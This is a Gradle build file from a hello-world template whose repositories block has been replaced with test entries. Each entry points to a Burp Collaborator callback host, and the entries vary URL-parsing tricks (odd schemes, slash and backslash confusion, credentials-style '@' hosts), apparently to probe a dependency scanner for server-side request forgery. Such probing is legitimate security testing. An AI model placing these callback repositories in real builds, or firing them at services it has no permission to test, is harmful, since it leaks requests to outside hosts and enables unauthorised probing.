apply plugin: 'java'
apply plugin: 'eclipse'
apply plugin: 'application'

mainClassName = 'hello.HelloWorld'

// tag::repositories[]
repositories { 
    vanilla {
        url 'http://v84lewqexklqy6597cm77vco0f65uu.burpcollaborator.net/vanilla'
    }
    duplicate-a {
        url 'http://snyk.io'
        url 'http://v84lewqexklqy6597cm77vco0f65uu.burpcollaborator.net/duplicate-a
    }
    duplicate-b {
        url 'http://v84lewqexklqy6597cm77vco0f65uu.burpcollaborator.net/duplicate-b'
        url 'http://snyk.io'
    }
    fragment {
        url 'http://snyk.io#fragment.v84lewqexklqy6597cm77vco0f65uu.burpcollaborator.net'
    }
    scheme-confusion {
        url 'ldap://v84lewqexklqy6597cm77vco0f65uu.burpcollaborator.net/ldap-scheme'
    }
    scheme-confusion2 {
        url 'gopher://v84lewqexklqy6597cm77vco0f65uu.burpcollaborator.net/gopher-scheme'
    }
    slash-confusion {
        url 'http:///v84lewqexklqy6597cm77vco0f65uu.burpcollaborator.net/s-confusion'
    }
    backslash-confusion {
        url 'http:\\v84lewqexklqy6597cm77vco0f65uu.burpcollaborator.net/bs-confusion'
    }
    credentials {
        url 'http://snyk.io@v84lewqexklqy6597cm77vco0f65uu.burpcollaborator.net/creds'
    }
    no-scheme {
        url 'v84lewqexklqy6597cm77vco0f65uu.burpcollaborator.net/no-scheme'
    }
}
// end::repositories[]

// tag::jar[]
jar {
    archiveBaseName = 'gs-gradle'
    archiveVersion =  '0.1.0'
}
// end::jar[]

// tag::dependencies[]
sourceCompatibility = 1.8
targetCompatibility = 1.8

dependencies {
    implementation "joda-time:joda-time:2.2"
    testImplementation "junit:junit:4.12"
}
// end::dependencies[]

// tag::wrapper[]
// end::wrapper[]
